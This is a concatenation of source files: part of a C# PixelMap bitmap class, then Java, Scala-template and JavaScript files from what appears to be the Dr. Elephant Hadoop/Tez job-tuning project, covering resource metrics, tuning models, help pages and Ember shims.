BPP = 4;
format = PixelFormat.Format32bppArgb;
}
/// <summary>
/// Clones a PixelMap.</summary>
public PixelMap(PixelMap original)
{
Width = original.Width;
Height = original.Height;
map = new Pixel[Width, Height];
BPP = original.BPP;
format = original.format;
for (int x = 0; x < Width; x++)
{
for (int y = 0; y < Height; y++)
{
this[x, y] = original[x, y];
}
}
}
/// <summary>
/// Quickly creates a PixelMap from a file path.</summary>
public PixelMap(string s) : this(new Bitmap(s))
{ }
/// <summary>
/// Quickly creates a PixelMap from a Bitmap.</summary>
/// <seealso cref="PixelMap.SlowLoad">
/// Copies a Bitmap through slow pixel-by-pixel reads. </seealso>
public PixelMap(Bitmap b)
{
Width = b.Width;
Height = b.Height;
map = new Pixel[Width, Height];
format = b.PixelFormat;
var data = b.LockBits(new Rectangle(0, 0, Width, Height), ImageLockMode.ReadOnly, format);
switch (b.PixelFormat)
{
case PixelFormat.Format32bppArgb:
case PixelFormat.Format32bppRgb:
BPP = 4;
break;
case PixelFormat.Format24bppRgb:
BPP = 3;
break;
default:
throw new FormatException("PixelFormat cannot be loaded. Try PixelMap.SlowLoad instead.");
}
int bytes = Math.Abs(data.Stride) * b.Height;
byte[] raw = new byte[bytes];
System.Runtime.InteropServices.Marshal.Copy(data.Scan0, raw, 0, bytes);
for (int x = 0; x < Width; x++)
{
for (int y = 0; y < Height; y++)
{
int offset = (y * data.Width + x) * BPP;
byte B = raw[offset];
offset++;
byte G = raw[offset];
offset++;
byte R = raw[offset];
byte A = 255; // default to fully opaque for pixel formats without an alpha channel
if (BPP == 4)
{
offset++;
A = raw[offset];
}
map[x, y] = new Pixel(A, R, G, B);
}
}
b.UnlockBits(data);
}
/// <summary>
/// The width of the PixelMap in pixels.</summary>
public readonly int Width;
/// <summary>
/// The height of the PixelMap in pixels.</summary>
public readonly int Height;
private readonly Pixel[,] map;
private readonly int BPP;
private readonly PixelFormat format;
/// <summary>
/// Access a Pixel of the PixelMap from its X and Y coordinates.</summary>
public Pixel this[int x, int y]
{
get
{
if (Inside(new Point(x, y)))
return map[x, y];
return map[Math.Max(Math.Min(x, Width - 1), 0), Math.Max(Math.Min(y, Height - 1), 0)];
}
set
{
if (Inside(new Point(x, y)))
map[x, y] = value;
}
}
/// <summary>
/// Access a Pixel of the PixelMap from its X and Y coordinates contained within a Point.</summary>
public Pixel this[Point p]
{
get { return this[p.X, p.Y]; }
set { this[p.X, p.Y] = value; }
}
/// <summary>
/// Access a Pixel of the PixelMap from its flattened index.</summary>
public Pixel this[int i]
{
get { return this[i / Height, i % Height]; }
set { this[i / Height, i % Height] = value; }
}
/// <summary>
/// Determine if a point is within this PixelMap.</summary>
public bool Inside(Point p)
{
return (p.X >= 0 && p.Y >= 0 && p.X < Width && p.Y < Height);
}
/// <summary>
/// Produce a Bitmap from this PixelMap.</summary>
public Bitmap GetBitmap()
{
var bitmap = new Bitmap(Width, Height);
var data = bitmap.LockBits(new Rectangle(0, 0, Width, Height), ImageLockMode.WriteOnly, format);
int bytes = Math.Abs(data.Stride) * bitmap.Height;
byte[] raw = new byte[bytes];
for (int x = 0; x < Width; x++)
{
for (int y = 0; y < Height; y++)
{
int offset = (y * data.Width + x) * BPP;
Pixel p = this[x, y];
raw[offset] = p.B;//BLUE
offset++;
raw[offset] = p.G;//GREEN
offset++;
raw[offset] = p.R;//RED
if (BPP == 4)
{
offset++;
raw[offset] = p.A;//ALPHA
}
}
}
System.Runtime.InteropServices.Marshal.Copy(raw, 0, data.Scan0, bytes);
bitmap.UnlockBits(data);
return bitmap;
}
/// <summary>
/// Load a Bitmap pixel-by-pixel, slowly.</summary>
public static PixelMap SlowLoad(Bitmap b)
{
PixelMap m = new PixelMap(b.Width, b.Height);
for (int x = 0; x < b.Width; x++)
{
for (int y = 0; y < b.Height; y++)
{
m[x, y] = new Pixel(b.GetPixel(x, y));
}
}
return m;
}
}
}
| ruarai/PixelMap |
<|start_filename|>app/views/tags/aggregatedMetrics.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
@(result: models.AppResult)
@import com.linkedin.drelephant.util.Utils;
@if(result.resourceUsed != 0) {
<p class="list-group-item-heading">
<table>
<tr>
<td class="metrics-dashboard hasTooltip" width="175px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=resources">--><img src='@routes.Assets.at("images/usedmemory.png")' class="metrics-icons" alt='used resources'/><!--</a>--> @Utils.getResourceInGBHours(result.resourceUsed) <div id="tooltip-div">
<span> The resources used by the job in GB Hours</span>
</div></td>
<td class="metrics-dashboard hasTooltip" width="100px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=resources">--><img src='@routes.Assets.at("images/wastedmemory.png")' class="metrics-icons" alt='wasted resources'/><!--</a>--> @(Utils.getPercentage(result.resourceWasted, result.resourceUsed)) <div id="tooltip-div">
<span> The percent of resources wasted</span>
</div></td>
<td class="metrics-dashboard hasTooltip" width="120px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=time">--><img src='@routes.Assets.at("images/runtime.png")' class="metrics-icons" alt='total runtime'/><!--</a>--> @(Utils.getDurationBreakdown(result.finishTime - result.startTime)) <div id="tooltip-div">
<span> Total runtime of the job in HH:MM:SS</span>
</div></td>
@if(!result.jobType.equals("Spark")) {
<td class="metrics-dashboard hasTooltip" width="100px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=time">--><img src='@routes.Assets.at("images/waittime.png")' class="metrics-icons" alt='total wait time'/><!--</a>--> @(Utils.getPercentage(result.totalDelay, result.finishTime - result.startTime)) <div id="tooltip-div">
<span> The percent of time job waited</span>
</div></td>
}
</tr>
</table>
</p>
}
<|start_filename|>app/com/linkedin/drelephant/AutoTuner.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant;
import org.apache.hadoop.conf.Configuration;
import org.apache.log4j.Logger;
import com.linkedin.drelephant.analysis.HDFSContext;
import com.linkedin.drelephant.tuning.AzkabanJobCompleteDetector;
import com.linkedin.drelephant.tuning.BaselineComputeUtil;
import com.linkedin.drelephant.tuning.FitnessComputeUtil;
import com.linkedin.drelephant.tuning.JobCompleteDetector;
import com.linkedin.drelephant.tuning.PSOParamGenerator;
import com.linkedin.drelephant.tuning.ParamGenerator;
import com.linkedin.drelephant.util.Utils;
import controllers.AutoTuningMetricsController;
/**
* This class is the AutoTuner daemon, which runs the following steps in order:
* - BaselineComputeUtil: computes the baseline for new jobs that have auto-tuning enabled
* - JobCompleteDetector: detects whether the current execution of a job has completed and updates its status in the DB
* - FitnessComputeUtil: computes the fitness of recently succeeded jobs
* - ParamGenerator: generates the next set of suggested parameters
*/
public class AutoTuner implements Runnable {
public static final long ONE_MIN = 60 * 1000;
private static final Logger logger = Logger.getLogger(AutoTuner.class);
private static final long DEFAULT_METRICS_COMPUTATION_INTERVAL = ONE_MIN / 5;
public static final String AUTO_TUNING_DAEMON_WAIT_INTERVAL = "autotuning.daemon.wait.interval.ms";
public void run() {
logger.info("Starting Auto Tuning thread");
HDFSContext.load();
Configuration configuration = ElephantContext.instance().getAutoTuningConf();
Long interval =
Utils.getNonNegativeLong(configuration, AUTO_TUNING_DAEMON_WAIT_INTERVAL, DEFAULT_METRICS_COMPUTATION_INTERVAL);
try {
AutoTuningMetricsController.init();
BaselineComputeUtil baselineComputeUtil = new BaselineComputeUtil();
FitnessComputeUtil fitnessComputeUtil = new FitnessComputeUtil();
ParamGenerator paramGenerator = new PSOParamGenerator();
JobCompleteDetector jobCompleteDetector = new AzkabanJobCompleteDetector();
while (!Thread.currentThread().isInterrupted()) {
try {
baselineComputeUtil.computeBaseline();
jobCompleteDetector.updateCompletedExecutions();
fitnessComputeUtil.updateFitness();
paramGenerator.getParams();
} catch (Exception e) {
logger.error("Error in auto tuner thread ", e);
}
Thread.sleep(interval);
}
} catch (Exception e) {
logger.error("Error in auto tuner thread ", e);
}
logger.info("Auto tuning thread shutting down");
}
}
<|start_filename|>app/com/linkedin/drelephant/tez/TezTaskLevelAggregatedMetrics.java<|end_filename|>
/*
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import com.linkedin.drelephant.math.Statistics;
import java.util.ArrayList;
import java.util.List;
import org.apache.commons.io.FileUtils;
import org.apache.log4j.Logger;
/**
* Aggregation functionality for task level metrics
*/
public class TezTaskLevelAggregatedMetrics {
private static final Logger logger = Logger.getLogger(TezTaskLevelAggregatedMetrics.class);
private long _delay = 0;
private long _resourceWasted = 0;
private long _resourceUsed = 0;
private List<Long> finishTimes = new ArrayList<Long>();
private List<Long> durations = new ArrayList<Long>();
private static final double MEMORY_BUFFER = 1.5;
private static final double CLUSTER_MEMORY_FACTOR = 2.1;
/**
* Returns the nth percentile finish time
* @param percentile The percentile of finish time to return
* @return The nth percentile finish time
*/
public long getNthPercentileFinishTime(int percentile)
{
if(finishTimes == null || finishTimes.size() == 0 ) {
return -1;
}
return Statistics.percentile(finishTimes, percentile);
}
/**
* Constructor for TaskLevelAggregatedMetrics
* @param taskData Array containing the task data for mappers and/or reducers
* @param containerSize The container size of the tasks
* @param idealStartTime The ideal start time for the task. For mappers it is the submit time, for
* reducers, it is the time when the number of completed maps becomes more than
* the slow start time.
*/
public TezTaskLevelAggregatedMetrics(TezTaskData[] taskData, long containerSize, long idealStartTime) {
compute(taskData, containerSize, idealStartTime);
}
/**
* Returns the overall delay for the tasks.
* @return The delay of the tasks.
*/
public long getDelay() {
return _delay;
}
/**
* Returns the resources wasted by all the tasks in MB Seconds
* @return The wasted resources of all the tasks in MB Seconds
*/
public long getResourceWasted() {
return _resourceWasted;
}
/**
* Returns the resource used by all the tasks in MB Seconds
* @return The total resources used by all tasks in MB Seconds
*/
public long getResourceUsed() {
return _resourceUsed;
}
/**
* Computes the aggregated metrics -> peakMemory, delay, total task duration, wasted resources and memory usage.
* @param taskDatas
* @param containerSize
* @param idealStartTime
*/
private void compute(TezTaskData[] taskDatas, long containerSize, long idealStartTime) {
long peakMemoryNeed = 0;
long taskFinishTimeMax = 0;
long taskDurationMax = 0;
// if there are zero tasks, then nothing to compute.
if(taskDatas == null || taskDatas.length == 0) {
return;
}
for (TezTaskData taskData: taskDatas) {
if (!taskData.isSampled()) {
continue;
}
long taskMemory = taskData.getCounters().get(TezCounterData.CounterName.PHYSICAL_MEMORY_BYTES)/ FileUtils.ONE_MB; // MB
long taskVM = taskData.getCounters().get(TezCounterData.CounterName.VIRTUAL_MEMORY_BYTES)/ FileUtils.ONE_MB; // MB
long taskDuration = taskData.getFinishTime() - taskData.getStartTime(); // Milliseconds
long taskCost = (containerSize) * (taskDuration / Statistics.SECOND_IN_MS); // MB Seconds
durations.add(taskDuration);
finishTimes.add(taskData.getFinishTime());
//peak Memory usage
long memoryRequiredForVM = (long) (taskVM/CLUSTER_MEMORY_FACTOR);
long biggerMemoryRequirement = memoryRequiredForVM > taskMemory ? memoryRequiredForVM : taskMemory;
peakMemoryNeed = biggerMemoryRequirement > peakMemoryNeed ? biggerMemoryRequirement : peakMemoryNeed;
if(taskFinishTimeMax < taskData.getFinishTime()) {
taskFinishTimeMax = taskData.getFinishTime();
}
if(taskDurationMax < taskDuration) {
taskDurationMax = taskDuration;
}
_resourceUsed += taskCost;
}
// Compute the delay in starting the task.
_delay = taskFinishTimeMax - (idealStartTime + taskDurationMax);
// invalid delay
if(_delay < 0) {
_delay = 0;
}
// wastedResources
long wastedMemory = containerSize - (long) (peakMemoryNeed * MEMORY_BUFFER);
if(wastedMemory > 0) {
for (long duration : durations) {
_resourceWasted += (wastedMemory) * (duration / Statistics.SECOND_IN_MS); // MB Seconds
}
}
}
}
<|start_filename|>app/models/JobSavedState.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import java.sql.Timestamp;
import javax.persistence.Column;
import play.db.ebean.Model;
import javax.persistence.Entity;
import javax.persistence.Id;
import javax.persistence.Table;
import com.avaje.ebean.annotation.UpdatedTimestamp;
@Entity
@Table(name = "job_saved_state")
public class JobSavedState extends Model {
private static final long serialVersionUID = 1L;
public static class TABLE {
public static final String TABLE_NAME = "job_saved_state";
public static final String jobDefinitionId = "jobDefinitionId";
public static final String savedState = "savedState";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@Id
public Integer jobDefinitionId;
@Column(nullable = false)
public byte[] savedState;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
public boolean isValid() {
return jobDefinitionId != null && savedState != null;
}
public static Finder<Integer, JobSavedState> find =
new Finder<Integer, JobSavedState>(Integer.class, JobSavedState.class);
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
}
<|start_filename|>test/com/linkedin/drelephant/tez/TezTaskLevelAggregatedMetricsTest.java<|end_filename|>
/*
* Copyright 2017 Electronic Arts Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import org.junit.Assert;
import org.junit.Test;
public class TezTaskLevelAggregatedMetricsTest {
@Test
public void testZeroTasks() {
TezTaskData taskData[] = {};
TezTaskLevelAggregatedMetrics taskMetrics = new TezTaskLevelAggregatedMetrics(taskData, 0, 0);
Assert.assertEquals(taskMetrics.getDelay(), 0);
Assert.assertEquals(taskMetrics.getResourceUsed(), 0);
Assert.assertEquals(taskMetrics.getResourceWasted(), 0);
}
@Test
public void testNullTaskArray() {
TezTaskLevelAggregatedMetrics taskMetrics = new TezTaskLevelAggregatedMetrics(null, 0, 0);
Assert.assertEquals(taskMetrics.getDelay(), 0);
Assert.assertEquals(taskMetrics.getResourceUsed(), 0);
Assert.assertEquals(taskMetrics.getResourceWasted(), 0);
}
@Test
public void testTaskLevelData() {
TezTaskData taskData[] = new TezTaskData[3];
TezCounterData counterData = new TezCounterData();
counterData.set(TezCounterData.CounterName.PHYSICAL_MEMORY_BYTES, 655577088L);
counterData.set(TezCounterData.CounterName.VIRTUAL_MEMORY_BYTES, 3051589632L);
long time[] = {0,0,0,1464218501117L, 1464218534148L};
taskData[0] = new TezTaskData("task", "id");
taskData[0].setTimeAndCounter(time,counterData);
taskData[1] = new TezTaskData("task", "id");
taskData[1].setTimeAndCounter(new long[5],counterData);
// Non-sampled task, which does not contain time and counter data
taskData[2] = new TezTaskData("task", "id");
TezTaskLevelAggregatedMetrics taskMetrics = new TezTaskLevelAggregatedMetrics(taskData, 4096L, 1463218501117L);
Assert.assertEquals(taskMetrics.getDelay(), 1000000000L);
Assert.assertEquals(taskMetrics.getResourceUsed(), 135168L);
Assert.assertEquals(taskMetrics.getResourceWasted(), 66627L);
}
}
<|start_filename|>app/views/help/tez/helpScopeTaskDataSkew.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
This analysis shows whether the input data is skewed across tasks and whether the grouping parameters need to be adjusted.
</p>
<p>
The result of the analysis splits the tasks into two groups, where the first group has significantly less input data than the second group.
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="">
<h4 class="list-group-item-heading">Mapper Data Skew</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>2205</td>
</tr>
<tr>
<td>Group A</td>
<td>953 tasks @@ 7 MB avg</td>
</tr>
<tr>
<td>Group B</td>
<td>1252 tasks @@ 512 MB avg</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h3>Suggestions</h3>
<p>
In Tez, input task sizes are computed by grouping splits together. Check whether tez.grouping.split-count=XX is set; if it is, XX tasks will be used to read the input data.
Otherwise, verify whether tez.grouping.min-size and tez.grouping.max-size are set so that they yield an appropriate number of tasks.
If there are many small files that need to be combined, use
set pig.splitCombination to true;
set pig.maxCombinedSplitSize XXXXX</p>
<|start_filename|>app/models/TuningJobExecutionParamSet.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import com.avaje.ebean.annotation.UpdatedTimestamp;
import java.sql.Timestamp;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.JoinColumn;
import javax.persistence.JoinTable;
import javax.persistence.OneToOne;
import javax.persistence.Table;
import play.db.ebean.Model;
@Entity
@Table(name = "tuning_job_execution_param_set")
public class TuningJobExecutionParamSet extends Model {
private static final long serialVersionUID = 1L;
public static class TABLE {
public static final String TABLE_NAME = "tuning_job_execution_param_set";
public static final String jobSuggestedParamSet = "jobSuggestedParamSet";
public static final String jobExecution = "jobExecution";
public static final String tuningEnabled = "tuningEnabled";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_suggested_param_set", joinColumns = {@JoinColumn(name = "job_suggested_param_set_id", referencedColumnName = "id")})
public JobSuggestedParamSet jobSuggestedParamSet;
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_execution", joinColumns = {@JoinColumn(name = "job_execution_id", referencedColumnName = "id")})
public JobExecution jobExecution;
public Boolean tuningEnabled;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
public static Finder<Long, TuningJobExecutionParamSet> find =
new Finder<Long, TuningJobExecutionParamSet>(Long.class, TuningJobExecutionParamSet.class);
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
}
<|start_filename|>app/views/help/tez/helpMapperTime.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
This analysis shows how well the number of input tasks in the Tez job is adjusted.<br>
It should help you tweak the number of input tasks for your job.<br>
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="#">
<h4 class="list-group-item-heading">Mapper Input Size</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>1516</td>
</tr>
<tr>
<td>Average task input size</td>
<td>19 KB</td>
</tr>
<tr>
<td>Average task runtime</td>
<td>1min 32s</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h4>Suggestions</h4>
<p>
You should tune the mapper split size to reduce the number of mappers and let each mapper process more data. <br>
The parameters for changing split size are: <br>
<ul>
<li>pig.splitCombination to true (Pig Only)</li>
<li>pig.maxCombinedSplitSize (Pig Only)</li>
</ul>
Examples on how to set them:
<ul>
<li>Pig: set pig.maxCombinedSplitSize XXXXX </li>
<li>Hive: set tez.grouping.min-size=XXXXX</li>
<li>set tez.grouping.max-size=XXXXX</li>
</ul>
The split size is controlled by the formula <b>max(minSplitSize, min(maxSplitSize, blockSize))</b>. By default,
blockSize=512MB and minSplit < blockSize < maxSplit. <br>
You should always refer to this formula.<br>
In the case above, try <b>increasing the min split size</b> so each mapper processes more data. For example, with a 512 MB block size, raising the min split size to 1 GB (assuming the max split size is at least that large) yields roughly 1 GB splits and about half as many mappers.<br>
<br>
See <a href="https://github.com/linkedin/dr-elephant/wiki/Tuning-Tips">Hadoop Tuning Tips</a> for further information.<br>
</p>
<|start_filename|>app/models/JobSuggestedParamSet.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import com.avaje.ebean.annotation.UpdatedTimestamp;
import java.sql.Timestamp;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.EnumType;
import javax.persistence.Enumerated;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.JoinColumn;
import javax.persistence.JoinTable;
import javax.persistence.ManyToOne;
import javax.persistence.OneToOne;
import javax.persistence.Table;
import play.db.ebean.Model;
@Entity
@Table(name = "job_suggested_param_set")
public class JobSuggestedParamSet extends Model {
private static final long serialVersionUID = -294471313051608818L;
public enum ParamSetStatus {
CREATED, SENT, EXECUTED, FITNESS_COMPUTED, DISCARDED
}
public static class TABLE {
public static final String TABLE_NAME = "job_suggested_param_set";
public static final String id = "id";
public static final String jobDefinition = "jobDefinition";
public static final String tuningAlgorithm = "tuningAlgorithm";
public static final String paramSetState = "paramSetState";
public static final String isParamSetDefault = "isParamSetDefault";
public static final String fitness = "fitness";
public static final String fitnessJobExecution = "fitnessJobExecution";
public static final String isParamSetBest = "isParamSetBest";
public static final String areConstraintsViolated = "areConstraintsViolated";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
public Long id;
@Column(nullable = false)
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_definition", joinColumns = {@JoinColumn(name = "job_definition_id", referencedColumnName = "id")})
public JobDefinition jobDefinition;
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_execution", joinColumns = {@JoinColumn(name = "fitness_job_execution_id", referencedColumnName = "id")})
public JobExecution fitnessJobExecution;
@Column(nullable = false)
@ManyToOne(cascade = CascadeType.ALL)
@JoinTable(name = "tuning_algorithm", joinColumns = {@JoinColumn(name = "tuning_algorithm_id", referencedColumnName = "id")})
public TuningAlgorithm tuningAlgorithm;
@Enumerated(EnumType.STRING)
public ParamSetStatus paramSetState;
@Column(nullable = false)
public Boolean isParamSetDefault;
public Double fitness;
@Column(nullable = false)
public Boolean isParamSetBest;
@Column(nullable = false)
public Boolean areConstraintsViolated;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
public static Model.Finder<Long, JobSuggestedParamSet> find =
new Model.Finder<Long, JobSuggestedParamSet>(Long.class, JobSuggestedParamSet.class);
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
}
<|start_filename|>bower_components/ember-cli-shims/tests/unit/general-importing-test.js<|end_filename|>
import require from 'require';
import { module, test } from 'qunit';
module('shims generally work');
test('ember shim', function(assert) {
assert.equal(self.Ember, require('ember').default);
});
test('ember-component', function(assert) {
assert.equal(self.Ember.Component, require('ember-component').default);
});
test('ember-runloop', function(assert) {
assert.equal(self.Ember.run.debounce, require('ember-runloop').debounce);
});
test('ember-helper', function(assert) {
assert.equal(self.Ember.Helper, require('ember-helper').default);
});
test('ember-set/ordered', function(assert) {
assert.equal(self.Ember.OrderedSet, require('ember-set/ordered').default);
});
<|start_filename|>bower_components/ember-cli-shims/index.js<|end_filename|>
/* eslint-env node */
'use strict';
var path = require('path');
var SilentError = require('silent-error');
var writeFile = require('broccoli-file-creator');
var MergeTrees = require('broccoli-merge-trees');
module.exports = {
name: 'ember-cli-shims',
included: function(app) {
this._super.included.apply(this, arguments);
var VersionChecker = require('ember-cli-version-checker');
var checker = new VersionChecker(this);
// specifically *not* trying to use `checker.forEmber` because
// we actually want to see if this is from npm for specific versions
var emberSourceDep = checker.for('ember-source', 'npm');
var emberCLIDep = checker.for('ember-cli', 'npm');
var emberSourceIncludesLegacyShims = emberSourceDep.gt('2.11.0-alpha.0') && emberSourceDep.lt('2.11.0-beta.5');
var emberCLISupportsOverridingShims = emberCLIDep.gt('2.11.0-alpha.0');
if (!emberCLISupportsOverridingShims) {
throw new SilentError('To consume ember-cli-shims from npm you must be using ember-cli@2.11.0-beta.1 or greater. Please update ember-cli to a newer version or remove ember-cli-shims from `package.json`.');
}
var projectBowerDeps = this.project.bowerDependencies();
if (projectBowerDeps['ember-cli-shims']) {
throw new SilentError('Using ember-cli-shims as both a bower dependency and an npm dependency is not supported. Please remove `ember-cli-shims` from `bower.json`.');
}
// ember-source@2.11.0-alpha and 2.11.0-beta series releases included
// their own legacy shims system, so this import is not needed with
// those ember-source versions
if (!emberSourceIncludesLegacyShims && emberCLISupportsOverridingShims) {
if (this.import) {
this.import('vendor/ember-cli-shims/deprecations.js');
this.import('vendor/ember-cli-shims/app-shims.js');
} else {
app.import('vendor/ember-cli-shims/deprecations.js');
app.import('vendor/ember-cli-shims/app-shims.js');
}
}
},
treeForVendor(vendorTree) {
var deprecations = require('./deprecations');
var rfc176Tree = writeFile('ember-cli-shims/deprecations.js', wrapJson('ember-cli-shims/deprecations', deprecations));
return new MergeTrees([vendorTree, rfc176Tree]);
},
};
function wrapJson(name, json) {
return `(function() {
define('${name}', [], function() {
var values = ${JSON.stringify(json)};
Object.defineProperty(values, '__esModule', {
value: true
});
return values;
});
})();`
}
<|start_filename|>bower_components/ember-cli-shims/deprecations.js<|end_filename|>
'use strict';
const mappings = require('ember-rfc176-data/mappings.json');
const deprecations = {};
mappings.filter(it => it.deprecated && it.replacement).filter(it => it.module.indexOf('ember-') === 0).forEach(it => {
if (!(it.module in deprecations)) {
deprecations[it.module] = {};
}
let replacement = [it.replacement.module];
if (it.replacement.export !== 'default') {
replacement.push(it.replacement.export);
}
deprecations[it.module][it.export] = replacement;
});
module.exports = deprecations;
<|start_filename|>app/com/linkedin/drelephant/tuning/Particle.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.tuning;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.annotation.JsonProperty;
import java.util.List;
/**
* Particle class represents a configuration set for a job
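 * <p>
 * A minimal illustrative JSON payload for this class, based on the Jackson annotations below (field values are hypothetical):
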